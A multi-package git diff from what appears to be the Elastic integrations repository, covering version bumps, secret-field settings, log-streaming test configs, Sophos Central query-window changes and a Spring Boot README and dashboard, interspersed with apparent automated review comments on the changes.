b/packages/slack/docs/README.md 
@@ -67,6 +67,7 @@ Audit logs summarize the history of changes made within the Slack Enterprise. | event.module | Event module | constant_keyword | | event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | | event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.hash.md5 | MD5 hash. | keyword | | host.architecture | Operating system architecture. | keyword | | host.containerized | If the host is a container. | boolean | | host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | 
@@ -88,6 +89,7 @@ Audit logs summarize the history of changes made within the Slack Enterprise. | log.file.path | Path to the log file. | keyword | | log.flags | Flags for the log file. | keyword | | log.offset | Offset of the entry in the log file. | long | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | | related.ip | All of the IPs seen on your event. | ip | | related.user | All the user names or other user identifiers seen on the event. | keyword | | slack.audit.context.domain | The domain of the Workspace or Enterprise | keyword | @@ -96,6 +98,7 @@ Audit logs summarize the history of changes made within the Slack Enterprise. | slack.audit.context.session_id | The identifier that is unique to each authenticated session. | keyword | | slack.audit.context.type | The type of account. Either `Workspace` or `Enterprise` | keyword | | slack.audit.details.location | The location the activity occured in when event.action is anomaly | keyword | +| slack.audit.details.md5 | The md5 hash of a file associated with a `file_malicious_content_detected` event. | keyword | | slack.audit.details.previous_ip_address | The IP address previously observed for the entity in the event when event.action is anomaly | ip | | slack.audit.details.previous_user_agent | The User-Agent string previously observed for the entity in the event when event.action is anomaly | keyword | | slack.audit.details.reason | The anomaly rule triggered to generate the event when event.action is anomaly: asn, excessive_downloads, ip_address, session_fingerprint, tor, user_agent | keyword | diff --git a/packages/slack/manifest.yml b/packages/slack/manifest.yml index aec4ef7292a..6c5b44846f9 100644 --- a/packages/slack/manifest.yml +++ b/packages/slack/manifest.yml 
@@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: slack title: "Slack Logs" -version: "1.17.1" +version: "1.19.0" description: "Slack Logs Integration" type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: "^8.10.1" + version: "^8.12.0" icons: - src: /img/slack.svg title: Slack logo diff --git a/packages/snort/changelog.yml b/packages/snort/changelog.yml index e4a5ab7a509..4ce0b70a5a2 100644 --- a/packages/snort/changelog.yml +++ b/packages/snort/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.14.1" changes: - description: Fix exclude_files pattern. diff --git a/packages/snort/manifest.yml b/packages/snort/manifest.yml index 9b99521d898..c37f5029a8e 100644 --- a/packages/snort/manifest.yml +++ b/packages/snort/manifest.yml @@ -1,6 +1,6 @@ name: snort title: Snort -version: "1.14.1" +version: "1.15.0" description: Collect logs from Snort with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: snort size: 120x60 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: [ids_ips, security] conditions: kibana: diff --git a/packages/snyk/changelog.yml b/packages/snyk/changelog.yml index 83040a60fa6..c66488d9728 100644 --- a/packages/snyk/changelog.yml +++ b/packages/snyk/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.20.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.20.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.19.1" changes: - description: Changed owners 
diff --git a/packages/snyk/manifest.yml b/packages/snyk/manifest.yml
index e3bff46257d..0763696d525 100644
--- a/packages/snyk/manifest.yml
+++ b/packages/snyk/manifest.yml
@@ -1,14 +1,15 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: snyk
 title: "Snyk"
-version: "1.19.1"
+version: "1.20.1"
 description: Collect logs from Snyk with Elastic Agent.
 type: integration
 categories:
 - security
+ - cloudsecurity_cdr
 conditions:
 kibana:
- version: "^8.7.1"
+ version: "^8.12.0"
 icons:
 - src: /img/snyk-logo.svg
 title: Snyk logo
@@ -44,6 +45,7 @@ policy_templates:
 multi: false
 show_user: true
 required: true
+ secret: true
 - name: http_client_timeout
 type: text
 title: HTTP Client Timeout
diff --git a/packages/sonicwall_firewall/_dev/deploy/docker/docker-compose.yml b/packages/sonicwall_firewall/_dev/deploy/docker/docker-compose.yml
index a54aa0d278d..186f54ccf28 100644
--- a/packages/sonicwall_firewall/_dev/deploy/docker/docker-compose.yml
+++ b/packages/sonicwall_firewall/_dev/deploy/docker/docker-compose.yml
@@ -7,8 +7,7 @@ services:
 - ${SERVICE_LOGS_DIR}:/var/log
 command: /bin/sh -c "cp /sample_logs/* /var/log/"
 sonicwall_firewall-syslog:
- image: docker.elastic.co/observability/stream:v0.7.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9514 -p=udp /sample_logs/log.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9514 -p=udp /sample_logs/log.log
diff --git a/packages/sonicwall_firewall/changelog.yml b/packages/sonicwall_firewall/changelog.yml
index 7a92556ba3e..5314f0f5a30 100644
--- a/packages/sonicwall_firewall/changelog.yml
+++ b/packages/sonicwall_firewall/changelog.yml
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.15.0" changes: - description: Add ecs fields mappings for event.sequence, event.severity, host.ip, http.request.body.bytes. diff --git a/packages/sonicwall_firewall/manifest.yml b/packages/sonicwall_firewall/manifest.yml index 55e7d6cea93..35cce33a4d6 100644 --- a/packages/sonicwall_firewall/manifest.yml +++ b/packages/sonicwall_firewall/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: sonicwall_firewall title: "SonicWall Firewall" -version: "1.15.0" +version: "1.16.0" description: "Integration for SonicWall firewall logs" type: integration categories: diff --git a/packages/sophos/_dev/deploy/docker/docker-compose.yml b/packages/sophos/_dev/deploy/docker/docker-compose.yml index ca49071f72c..df62ffc70f3 100644 --- a/packages/sophos/_dev/deploy/docker/docker-compose.yml +++ b/packages/sophos/_dev/deploy/docker/docker-compose.yml 
@@ -7,32 +7,27 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" sophos-utm-udp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-utm*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-utm*.log sophos-utm-tcp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=tcp /sample_logs/sophos-utm*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=tcp /sample_logs/sophos-utm*.log sophos-xg-udp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-xg*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-xg*.log sophos-xg-tcp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=tcp /sample_logs/sophos-xg*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=tcp /sample_logs/sophos-xg*.log sophos-xg-tls: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - 
command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9550 -p=tls --insecure /sample_logs/sophos-xg*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9550 -p=tls --insecure /sample_logs/sophos-xg*.log diff --git a/packages/sophos/changelog.yml b/packages/sophos/changelog.yml index dd6a9dc0c7c..8210b44a59f 100644 --- a/packages/sophos/changelog.yml +++ b/packages/sophos/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "3.9.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "3.8.2" changes: - description: Changed owners diff --git a/packages/sophos/manifest.yml b/packages/sophos/manifest.yml index d363542b631..2e8c1396420 100644 --- a/packages/sophos/manifest.yml +++ b/packages/sophos/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: sophos title: Sophos -version: "3.8.2" +version: "3.9.0" description: Collect logs from Sophos with Elastic Agent. categories: - "security" diff --git a/packages/sophos_central/changelog.yml b/packages/sophos_central/changelog.yml index 367c30632ab..61e07f75170 100644 --- a/packages/sophos_central/changelog.yml +++ b/packages/sophos_central/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.14.0" + changes: + - description: Set sensitive values as secret and fix incorrect mapping. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.13.2" + changes: + - description: Ensure from_date parameter is within bounds. + type: bugfix + link: https://github.com/elastic/integrations/pull/9143 - version: "1.13.1" changes: - description: Changed owners diff --git a/packages/sophos_central/data_stream/alert/agent/stream/httpjson.yml.hbs b/packages/sophos_central/data_stream/alert/agent/stream/httpjson.yml.hbs index d7af95442d4..5379b8aaaca 100644 
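Review bot: The wildcard paths `/sample_logs/sophos-utm*.log` and `/sample_logs/sophos-xg*.log` on every new `command:` line were previously expanded by `/bin/bash -c`; with `entrypoint: /bin/bash` dropped, Compose splits the command string into arguments with no shell, so the `*` reaches the image entrypoint literally. Unless `stream log` in v0.15.0 expands globs itself (not verifiable from this diff), each of the five services would try to open a file that does not exist and stream nothing; the sonicwall change in the same PR is unaffected because it names a single `log.log`. Worth confirming against the stream CLI, or keeping the shell form for these services if the image still ships one, e.g. `command: ["/bin/sh", "-c", "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-utm*.log"]`. Separately, `--insecure` on the `sophos-xg-tls` service is carried forward without explanation; a one-line comment such as `# --insecure: TLS verification disabled for the local test harness only` would keep it from being copied into non-test configs.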
--- a/packages/sophos_central/data_stream/alert/agent/stream/httpjson.yml.hbs +++ b/packages/sophos_central/data_stream/alert/agent/stream/httpjson.yml.hbs @@ -25,8 +25,8 @@ request.transforms: value: {{tenant_id}} - set: target: url.params.from_date - value: '[[.cursor.from_date]]' - default: '[[(now (parseDuration "-{{initial_interval}}")).Unix]]' + value: '[[max .cursor.from_date ((now).Add (parseDuration "-23h59m")).Unix]]' + default: '[[max (now (parseDuration "-23h59m")).Unix (now (parseDuration "-{{initial_interval}}")).Unix]]' - set: target: url.params.limit value: {{batch_size}} diff --git a/packages/sophos_central/data_stream/alert/fields/fields.yml b/packages/sophos_central/data_stream/alert/fields/fields.yml index 91ca03c301f..e552a5a1221 100644 --- a/packages/sophos_central/data_stream/alert/fields/fields.yml +++ b/packages/sophos_central/data_stream/alert/fields/fields.yml @@ -28,7 +28,7 @@ - name: items type: group fields: - - name: descriptior + - name: descriptor type: keyword description: Descriptor of items. - name: process_path diff --git a/packages/sophos_central/data_stream/event/agent/stream/httpjson.yml.hbs b/packages/sophos_central/data_stream/event/agent/stream/httpjson.yml.hbs index b8bcf9e3193..08654aef8f1 100644 --- a/packages/sophos_central/data_stream/event/agent/stream/httpjson.yml.hbs +++ b/packages/sophos_central/data_stream/event/agent/stream/httpjson.yml.hbs @@ -25,8 +25,8 @@ request.transforms: value: {{tenant_id}} - set: target: url.params.from_date - value: '[[.cursor.from_date]]' - default: '[[(now (parseDuration "-{{initial_interval}}")).Unix]]' + value: '[[max .cursor.from_date ((now).Add (parseDuration "-23h59m")).Unix]]' + default: '[[max (now (parseDuration "-23h59m")).Unix (now (parseDuration "-{{initial_interval}}")).Unix]]' - set: target: url.params.limit value: {{batch_size}} diff --git a/packages/sophos_central/docs/README.md b/packages/sophos_central/docs/README.md index ed29ff5224e..7df48147f80 100644 
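Review bot: The new `from_date` clamp silently discards data: if the agent is stopped for more than roughly 24h, `max .cursor.from_date ...` moves the window forward to now-23h59m and events in the gap are never requested, and nothing in the template records that trade-off. A Handlebars comment above the transform would make it explicit, e.g. `{{!-- from_date is clamped to now-23h59m (presumably the API's lookback bound, see PR 9143): events older than that after an outage are skipped, not backfilled --}}`. Also, `max` only compares as intended if `.cursor.from_date` is stored as a number comparable with `.Unix`; if the cursor writes it as a string this may not behave as expected, which is worth confirming against the `cursor:` section outside this hunk. The enclosing `request.transforms` list starts before the hunk.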
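Review bot: The two template lines now spell the same computation in two different forms — `((now).Add (parseDuration "-23h59m")).Unix` in `value:` and `(now (parseDuration "-23h59m")).Unix` in `default:` — which reads as two different intentions when the difference is only style. The second form is the one the original `default:` line already used, so `value: '[[max .cursor.from_date (now (parseDuration "-23h59m")).Unix]]'` would make both lines match. This hunk is the `event` stream copy of the `alert` change and the same unification applies there; the `request.transforms` list it belongs to starts before the hunk.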
--- a/packages/sophos_central/docs/README.md +++ b/packages/sophos_central/docs/README.md @@ -272,7 +272,7 @@ An example event for `alert` looks as following: | sophos_central.alert.customer_id | The unique identifier of the customer linked with this record. | keyword | | sophos_central.alert.data.app_id | App identifier. | keyword | | sophos_central.alert.data.certificates | Certificates of alert. | keyword | -| sophos_central.alert.data.core_remedy.items.descriptior | Descriptor of items. | keyword | +| sophos_central.alert.data.core_remedy.items.descriptor | Descriptor of items. | keyword | | sophos_central.alert.data.core_remedy.items.process_path | Process path of sophos items. | keyword | | sophos_central.alert.data.core_remedy.items.result | The following values are allowed: NOT_APPLICABLE, SUCCESS, NOT_FOUND, DELETED, FAILED_TO_DELETE, WHITELISTED, OTHER_ERROR, FAILED_TO_DELETE_SYSTEM_PROTECTED. | keyword | | sophos_central.alert.data.core_remedy.items.sophos_pid | Process id of sophos items. | keyword | diff --git a/packages/sophos_central/manifest.yml b/packages/sophos_central/manifest.yml index 270ea65cc71..2b47e94fc0c 100644 --- a/packages/sophos_central/manifest.yml +++ b/packages/sophos_central/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: sophos_central title: Sophos Central -version: "1.13.1" +version: "1.14.0" description: This Elastic integration collects logs from Sophos Central with Elastic Agent. type: integration categories: - security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: "basic" screenshots: @@ -55,6 +55,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: tenant_id type: text title: Tenant ID @@ -77,6 +78,7 @@ policy_templates: required: true show_user: false default: https://id.sophos.com + secret: false - name: proxy_url type: text title: Proxy URL 
diff --git a/packages/spring_boot/_dev/build/docs/README.md b/packages/spring_boot/_dev/build/docs/README.md index 226e839b3bb..5e4e26df65c 100644 --- a/packages/spring_boot/_dev/build/docs/README.md +++ b/packages/spring_boot/_dev/build/docs/README.md 
@@ -1,17 +1,45 @@ # Spring Boot integration +## Overview + The Spring Boot integration is used to fetch observability data from [Spring Boot Actuator web endpoints](https://docs.spring.io/spring-boot/docs/2.6.3/actuator-api/htmlsingle/) and ingest it into Elasticsearch. +Use the Spring Boot integration to: + +- Collect logs related to audit events, HTTP trace, and metrics related to garbage collection(gc), memory, and threading. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + +## Data streams + +The Spring Boot integration collects logs and metrics data. + +Logs help you keep a record of events that occur on your machine. The Log data streams collected by Spring Boot integration are `auditevents` and `httptrace`, allowing users to track authentication events, HTTP request and response details, enabling comprehensive monitoring and security auditing. + +Metrics provide insight into the statistics of Spring Boot. The Metrics data streams collected by the Spring Boot integration include auditevents, gc, httptrace, memory, and threading, enabling users to monitor and troubleshoot the performance of Spring Boot instances. + +Data streams: +- `auditevents`: Collects information related to the authentication status, remote address, document ID and principal. +- `gc`: Collects information related to the GC collector name, memory usage before and after collection, thread count, and time metrics. +- `httptrace`: Collects information related to the http requests, status response, principal and session details. +- `memory`: Collects information related to the heap and non-heap memory, buffer pool and manager. +- `threading`: Collects information related to the thread allocations, monitoring and CPU times. 
+ +Note: +- Users can monitor and view the logs inside the ingested documents for Spring Boot in the `logs-*` index pattern from `Discover`, while for metrics, the index pattern is `metrics-*`. + ## Compatibility This integration has been tested against Spring Boot v2.7.17 with LTS JDK versions 8, 11, 17, and 21. ## Requirements +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended or self-manage the Elastic Stack on your own hardware. + In order to ingest data from Spring Boot: - You must know the host for Spring Boot application, add that host while configuring the integration package. - Add default path for jolokia. -- Spring-boot-actuator module provides all Spring Boot’s production-ready features. So add below dependency in `pom.xml` file. +- Spring-boot-actuator module provides all Spring Boot's production-ready features. You also need to add the following dependency to the `pom.xml` file: ``` org.springframework.boot 
@@ -28,11 +56,19 @@ In order to ingest data from Spring Boot: - To expose `HTTP Trace` metrics following class can be used [InMemoryHttpTraceRepository](https://docs.spring.io/spring-boot/docs/2.0.6.RELEASE/api/org/springframework/boot/actuate/trace/http/InMemoryHttpTraceRepository.html). - To expose `Audit Events` metrics following class can be used [InMemoryAuditEventRepository](https://docs.spring.io/spring-boot/docs/current/api/org/springframework/boot/actuate/audit/InMemoryAuditEventRepository.html). -### Troubleshooting +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After the integration is successfully configured, click on the *Assets* tab of the Spring Boot Integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting -- If **[Spring Boot] Audit Events panel** does not display older documents after upgrading to ``0.9.0`` or later versions, then this issue can be solved by reindexing the ``Audit Events`` data stream's indices. -- If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit Events`` data stream's indices. -- If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Garbage Collector``, ``Memory`` and ``Threading`` data stream's indices. 
+- If **[Spring Boot] Audit Events panel** does not display older documents after upgrading to ``0.9.0`` or later versions, this issue can be resolved by reindexing the ``Audit Events`` data stream. +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit Events`` data stream. +- If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Garbage Collector``, ``Memory`` and ``Threading`` data stream. ## Logs diff --git a/packages/spring_boot/changelog.yml b/packages/spring_boot/changelog.yml index 4d73df02cbe..abc00c5b4a2 100644 --- a/packages/spring_boot/changelog.yml +++ b/packages/spring_boot/changelog.yml 
@@ -1,4 +1,29 @@ # newer versions go on top +- version: "1.4.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.3.2" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.3.1" + changes: + - description: Update README to follow documentation guidelines. + type: enhancement + link: https://github.com/elastic/integrations/pull/9070 +- version: "1.3.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "1.2.2" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: "1.2.1" changes: - description: Add null and ignore_missing check to handle event.original field. diff --git a/packages/spring_boot/docs/README.md b/packages/spring_boot/docs/README.md index 384934c4d00..0bd32cf577f 100644 --- a/packages/spring_boot/docs/README.md +++ b/packages/spring_boot/docs/README.md 
@@ -1,17 +1,45 @@ # Spring Boot integration +## Overview + The Spring Boot integration is used to fetch observability data from [Spring Boot Actuator web endpoints](https://docs.spring.io/spring-boot/docs/2.6.3/actuator-api/htmlsingle/) and ingest it into Elasticsearch. +Use the Spring Boot integration to: + +- Collect logs related to audit events, HTTP trace, and metrics related to garbage collection(gc), memory, and threading. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + +## Data streams + +The Spring Boot integration collects logs and metrics data. + +Logs help you keep a record of events that occur on your machine. The Log data streams collected by Spring Boot integration are `auditevents` and `httptrace`, allowing users to track authentication events, HTTP request and response details, enabling comprehensive monitoring and security auditing. + +Metrics provide insight into the statistics of Spring Boot. The Metrics data streams collected by the Spring Boot integration include auditevents, gc, httptrace, memory, and threading, enabling users to monitor and troubleshoot the performance of Spring Boot instances. + +Data streams: +- `auditevents`: Collects information related to the authentication status, remote address, document ID and principal. +- `gc`: Collects information related to the GC collector name, memory usage before and after collection, thread count, and time metrics. +- `httptrace`: Collects information related to the http requests, status response, principal and session details. +- `memory`: Collects information related to the heap and non-heap memory, buffer pool and manager. +- `threading`: Collects information related to the thread allocations, monitoring and CPU times. 
+ +Note: +- Users can monitor and view the logs inside the ingested documents for Spring Boot in the `logs-*` index pattern from `Discover`, while for metrics, the index pattern is `metrics-*`. + ## Compatibility This integration has been tested against Spring Boot v2.7.17 with LTS JDK versions 8, 11, 17, and 21. ## Requirements +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended or self-manage the Elastic Stack on your own hardware. + In order to ingest data from Spring Boot: - You must know the host for Spring Boot application, add that host while configuring the integration package. - Add default path for jolokia. -- Spring-boot-actuator module provides all Spring Boot’s production-ready features. So add below dependency in `pom.xml` file. +- Spring-boot-actuator module provides all Spring Boot's production-ready features. You also need to add the following dependency to the `pom.xml` file: ``` org.springframework.boot 
@@ -28,11 +56,19 @@ In order to ingest data from Spring Boot: - To expose `HTTP Trace` metrics following class can be used [InMemoryHttpTraceRepository](https://docs.spring.io/spring-boot/docs/2.0.6.RELEASE/api/org/springframework/boot/actuate/trace/http/InMemoryHttpTraceRepository.html). - To expose `Audit Events` metrics following class can be used [InMemoryAuditEventRepository](https://docs.spring.io/spring-boot/docs/current/api/org/springframework/boot/actuate/audit/InMemoryAuditEventRepository.html). -### Troubleshooting +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After the integration is successfully configured, click on the *Assets* tab of the Spring Boot Integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting -- If **[Spring Boot] Audit Events panel** does not display older documents after upgrading to ``0.9.0`` or later versions, then this issue can be solved by reindexing the ``Audit Events`` data stream's indices. -- If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit Events`` data stream's indices. -- If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Garbage Collector``, ``Memory`` and ``Threading`` data stream's indices. 
+- If **[Spring Boot] Audit Events panel** does not display older documents after upgrading to ``0.9.0`` or later versions, this issue can be resolved by reindexing the ``Audit Events`` data stream. +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit Events`` data stream. +- If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Garbage Collector``, ``Memory`` and ``Threading`` data stream. ## Logs diff --git a/packages/spring_boot/kibana/dashboard/spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00.json b/packages/spring_boot/kibana/dashboard/spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00.json index 17749eba1d1..80518abebe0 100644 --- a/packages/spring_boot/kibana/dashboard/spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00.json +++ b/packages/spring_boot/kibana/dashboard/spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00.json 
@@ -1,77 +1,437 @@ { - "attributes": { - "description": "Audit events of the Spring Boot system.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2024-01-03T20:12:28.833Z", + "created_at": "2024-01-03T20:12:28.833Z", + "version": "Wzk5LDFd", + "attributes": { + "description": "Audit events of the Spring Boot system.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "41dbf555-e40a-45dc-83d7-18b18263e8de": { + "columnOrder": [ + "3624c7a7-411d-4138-9fdf-8b8a0694d285", + "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "a84b9b2d-8712-4975-a242-7996161a71da", + "5209c821-5ae2-40d6-b2c5-321b76c96ebc", + "52932019-4385-469b-9f4d-6becd3a912f6", + "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081" + ], + "columns": { + "3624c7a7-411d-4138-9fdf-8b8a0694d285": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100 values of spring_boot.audit_events.document_id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 100 + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.document_id" + }, + "5209c821-5ae2-40d6-b2c5-321b76c96ebc": { + "customLabel": true, + 
"dataType": "string", + "isBucketed": false, + "label": "Host", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.data.remote_address" + }, + "52932019-4385-469b-9f4d-6becd3a912f6": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Session ID", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.data.session_id" + }, + "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Authentication type", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.type" + }, + "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": false, + "interval": "1s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "a84b9b2d-8712-4975-a242-7996161a71da": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Principal", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.principal" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.audit_events" + }, + "type": 